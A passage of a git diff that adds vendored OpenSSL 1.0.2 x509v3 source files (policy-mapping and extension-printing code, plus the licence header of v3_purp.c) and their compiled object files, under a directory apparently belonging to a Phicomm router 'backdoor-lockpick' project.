za_5T6%YK29(f^?D($CAmN|2j7%l4T<)h(5abTorij`kP5g>r7$=b`_n&Y@`Rh5dz3
z5(fD>>}pSNO~Jc~cP?pyq~F*T0^f1~&OX%k5U#yjPca^4T)GGBLhP{N1B4^zzl~2&
zEOPcxGeznTnIP#>U-~p-cKsP9d~U@%mYpQK+4^1M!#cx!tRMEsUcb|Xp_E<U;lnac
zK2sdiApHcjX7#)IS7(O#sE^uq{nrUYeYsCa)l%a6&k4Z2tef=s9}?Z9UgdZbgKl%z
z2*ayp(?4dwA)hHSe!;Gif}D2z76Wqc3Ez(YfE>-%Z-v)yg#)pE_>M}vd2iaa5i-sj
p8t1-)uzQ-s<2AAOo*;FR5A>3?V3tY$TFv8c@c2JPGDGb6e*kzN;Y|Pl

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pmaps.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pmaps.c
new file mode 100644
index 0000000..a168343
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pmaps.c
@@ -0,0 +1,156 @@
+/* v3_pmaps.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static void *v2i_POLICY_MAPPINGS(const X509V3_EXT_METHOD *method,
+                                 X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
+static STACK_OF(CONF_VALUE) *i2v_POLICY_MAPPINGS(const X509V3_EXT_METHOD
+                                                 *method, void *pmps, STACK_OF(CONF_VALUE)
+                                                 *extlist);
+
+const X509V3_EXT_METHOD v3_policy_mappings = {
+    NID_policy_mappings, 0,
+    ASN1_ITEM_ref(POLICY_MAPPINGS),
+    0, 0, 0, 0,
+    0, 0,
+    i2v_POLICY_MAPPINGS,
+    v2i_POLICY_MAPPINGS,
+    0, 0,
+    NULL
+};
+
+ASN1_SEQUENCE(POLICY_MAPPING) = {
+        ASN1_SIMPLE(POLICY_MAPPING, issuerDomainPolicy, ASN1_OBJECT),
+        ASN1_SIMPLE(POLICY_MAPPING, subjectDomainPolicy, ASN1_OBJECT)
+} ASN1_SEQUENCE_END(POLICY_MAPPING)
+
+ASN1_ITEM_TEMPLATE(POLICY_MAPPINGS) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, POLICY_MAPPINGS,
+                                                                POLICY_MAPPING)
+ASN1_ITEM_TEMPLATE_END(POLICY_MAPPINGS)
+
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(POLICY_MAPPING)
+
+static STACK_OF(CONF_VALUE) *i2v_POLICY_MAPPINGS(const X509V3_EXT_METHOD
+                                                 *method, void *a, STACK_OF(CONF_VALUE)
+                                                 *ext_list)
+{
+    POLICY_MAPPINGS *pmaps = a;
+    POLICY_MAPPING *pmap;
+    int i;
+    char obj_tmp1[80];
+    char obj_tmp2[80];
+    for (i = 0; i < sk_POLICY_MAPPING_num(pmaps); i++) {
+        pmap = sk_POLICY_MAPPING_value(pmaps, i);
+        i2t_ASN1_OBJECT(obj_tmp1, 80, pmap->issuerDomainPolicy);
+        i2t_ASN1_OBJECT(obj_tmp2, 80, pmap->subjectDomainPolicy);
+        X509V3_add_value(obj_tmp1, obj_tmp2, &ext_list);
+    }
+    return ext_list;
+}
+
+static void *v2i_POLICY_MAPPINGS(const X509V3_EXT_METHOD *method,
+                                 X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval)
+{
+    POLICY_MAPPINGS *pmaps;
+    POLICY_MAPPING *pmap;
+    ASN1_OBJECT *obj1, *obj2;
+    CONF_VALUE *val;
+    int i;
+
+    if (!(pmaps = sk_POLICY_MAPPING_new_null())) {
+        X509V3err(X509V3_F_V2I_POLICY_MAPPINGS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        val = sk_CONF_VALUE_value(nval, i);
+        if (!val->value || !val->name) {
+            sk_POLICY_MAPPING_pop_free(pmaps, POLICY_MAPPING_free);
+            X509V3err(X509V3_F_V2I_POLICY_MAPPINGS,
+                      X509V3_R_INVALID_OBJECT_IDENTIFIER);
+            X509V3_conf_err(val);
+            return NULL;
+        }
+        obj1 = OBJ_txt2obj(val->name, 0);
+        obj2 = OBJ_txt2obj(val->value, 0);
+        if (!obj1 || !obj2) {
+            sk_POLICY_MAPPING_pop_free(pmaps, POLICY_MAPPING_free);
+            X509V3err(X509V3_F_V2I_POLICY_MAPPINGS,
+                      X509V3_R_INVALID_OBJECT_IDENTIFIER);
+            X509V3_conf_err(val);
+            return NULL;
+        }
+        pmap = POLICY_MAPPING_new();
+        if (!pmap) {
+            sk_POLICY_MAPPING_pop_free(pmaps, POLICY_MAPPING_free);
+            X509V3err(X509V3_F_V2I_POLICY_MAPPINGS, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        pmap->issuerDomainPolicy = obj1;
+        pmap->subjectDomainPolicy = obj2;
+        sk_POLICY_MAPPING_push(pmaps, pmap);
+    }
+    return pmaps;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pmaps.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pmaps.o
new file mode 100644
index 0000000000000000000000000000000000000000..7f057d32d88c4fb633f8bfe62c8736d80e3bf8eb
GIT binary patch
literal 5152
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_prn.c
new file mode 100644
index 0000000..acc9c6d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_prn.c
@@ -0,0 +1,259 @@
+/* v3_prn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* X509 v3 extension utilities */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+/* Extension printing routines */
+
+static int unknown_ext_print(BIO *out, X509_EXTENSION *ext,
+                             unsigned long flag, int indent, int supported);
+
+/* Print out a name+value stack */
+
+void X509V3_EXT_val_prn(BIO *out, STACK_OF(CONF_VALUE) *val, int indent,
+                        int ml)
+{
+    int i;
+    CONF_VALUE *nval;
+    if (!val)
+        return;
+    if (!ml || !sk_CONF_VALUE_num(val)) {
+        BIO_printf(out, "%*s", indent, "");
+        if (!sk_CONF_VALUE_num(val))
+            BIO_puts(out, "<EMPTY>\n");
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(val); i++) {
+        if (ml)
+            BIO_printf(out, "%*s", indent, "");
+        else if (i > 0)
+            BIO_printf(out, ", ");
+        nval = sk_CONF_VALUE_value(val, i);
+        if (!nval->name)
+            BIO_puts(out, nval->value);
+        else if (!nval->value)
+            BIO_puts(out, nval->name);
+#ifndef CHARSET_EBCDIC
+        else
+            BIO_printf(out, "%s:%s", nval->name, nval->value);
+#else
+        else {
+            int len;
+            char *tmp;
+            len = strlen(nval->value) + 1;
+            tmp = OPENSSL_malloc(len);
+            if (tmp) {
+                ascii2ebcdic(tmp, nval->value, len);
+                BIO_printf(out, "%s:%s", nval->name, tmp);
+                OPENSSL_free(tmp);
+            }
+        }
+#endif
+        if (ml)
+            BIO_puts(out, "\n");
+    }
+}
+
+/* Main routine: print out a general extension */
+
+int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, unsigned long flag,
+                     int indent)
+{
+    void *ext_str = NULL;
+    char *value = NULL;
+    const unsigned char *p;
+    const X509V3_EXT_METHOD *method;
+    STACK_OF(CONF_VALUE) *nval = NULL;
+    int ok = 1;
+
+    if (!(method = X509V3_EXT_get(ext)))
+        return unknown_ext_print(out, ext, flag, indent, 0);
+    p = ext->value->data;
+    if (method->it)
+        ext_str =
+            ASN1_item_d2i(NULL, &p, ext->value->length,
+                          ASN1_ITEM_ptr(method->it));
+    else
+        ext_str = method->d2i(NULL, &p, ext->value->length);
+
+    if (!ext_str)
+        return unknown_ext_print(out, ext, flag, indent, 1);
+
+    if (method->i2s) {
+        if (!(value = method->i2s(method, ext_str))) {
+            ok = 0;
+            goto err;
+        }
+#ifndef CHARSET_EBCDIC
+        BIO_printf(out, "%*s%s", indent, "", value);
+#else
+        {
+            int len;
+            char *tmp;
+            len = strlen(value) + 1;
+            tmp = OPENSSL_malloc(len);
+            if (tmp) {
+                ascii2ebcdic(tmp, value, len);
+                BIO_printf(out, "%*s%s", indent, "", tmp);
+                OPENSSL_free(tmp);
+            }
+        }
+#endif
+    } else if (method->i2v) {
+        if (!(nval = method->i2v(method, ext_str, NULL))) {
+            ok = 0;
+            goto err;
+        }
+        X509V3_EXT_val_prn(out, nval, indent,
+                           method->ext_flags & X509V3_EXT_MULTILINE);
+    } else if (method->i2r) {
+        if (!method->i2r(method, ext_str, out, indent))
+            ok = 0;
+    } else
+        ok = 0;
+
+ err:
+    sk_CONF_VALUE_pop_free(nval, X509V3_conf_free);
+    if (value)
+        OPENSSL_free(value);
+    if (method->it)
+        ASN1_item_free(ext_str, ASN1_ITEM_ptr(method->it));
+    else
+        method->ext_free(ext_str);
+    return ok;
+}
+
+int X509V3_extensions_print(BIO *bp, char *title,
+                            STACK_OF(X509_EXTENSION) *exts,
+                            unsigned long flag, int indent)
+{
+    int i, j;
+
+    if (sk_X509_EXTENSION_num(exts) <= 0)
+        return 1;
+
+    if (title) {
+        BIO_printf(bp, "%*s%s:\n", indent, "", title);
+        indent += 4;
+    }
+
+    for (i = 0; i < sk_X509_EXTENSION_num(exts); i++) {
+        ASN1_OBJECT *obj;
+        X509_EXTENSION *ex;
+        ex = sk_X509_EXTENSION_value(exts, i);
+        if (indent && BIO_printf(bp, "%*s", indent, "") <= 0)
+            return 0;
+        obj = X509_EXTENSION_get_object(ex);
+        i2a_ASN1_OBJECT(bp, obj);
+        j = X509_EXTENSION_get_critical(ex);
+        if (BIO_printf(bp, ": %s\n", j ? "critical" : "") <= 0)
+            return 0;
+        if (!X509V3_EXT_print(bp, ex, flag, indent + 4)) {
+            BIO_printf(bp, "%*s", indent + 4, "");
+            M_ASN1_OCTET_STRING_print(bp, ex->value);
+        }
+        if (BIO_write(bp, "\n", 1) <= 0)
+            return 0;
+    }
+    return 1;
+}
+
+static int unknown_ext_print(BIO *out, X509_EXTENSION *ext,
+                             unsigned long flag, int indent, int supported)
+{
+    switch (flag & X509V3_EXT_UNKNOWN_MASK) {
+
+    case X509V3_EXT_DEFAULT:
+        return 0;
+
+    case X509V3_EXT_ERROR_UNKNOWN:
+        if (supported)
+            BIO_printf(out, "%*s<Parse Error>", indent, "");
+        else
+            BIO_printf(out, "%*s<Not Supported>", indent, "");
+        return 1;
+
+    case X509V3_EXT_PARSE_UNKNOWN:
+        return ASN1_parse_dump(out,
+                               ext->value->data, ext->value->length, indent,
+                               -1);
+    case X509V3_EXT_DUMP_UNKNOWN:
+        return BIO_dump_indent(out, (char *)ext->value->data,
+                               ext->value->length, indent);
+
+    default:
+        return 1;
+    }
+}
+
+#ifndef OPENSSL_NO_FP_API
+int X509V3_EXT_print_fp(FILE *fp, X509_EXTENSION *ext, int flag, int indent)
+{
+    BIO *bio_tmp;
+    int ret;
+    if (!(bio_tmp = BIO_new_fp(fp, BIO_NOCLOSE)))
+        return 0;
+    ret = X509V3_EXT_print(bio_tmp, ext, flag, indent);
+    BIO_free(bio_tmp);
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..40735e9c31f89b5a00c0457740915822995afb65
GIT binary patch
literal 6160
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
XUsPqdr<JmI<K_<X4d=0RFSh>=B6&Oj

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_purp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_purp.c
new file mode 100644
index 0000000..36b0d87
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_purp.c
@@ -0,0 +1,851 @@
+/* v3_purp.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
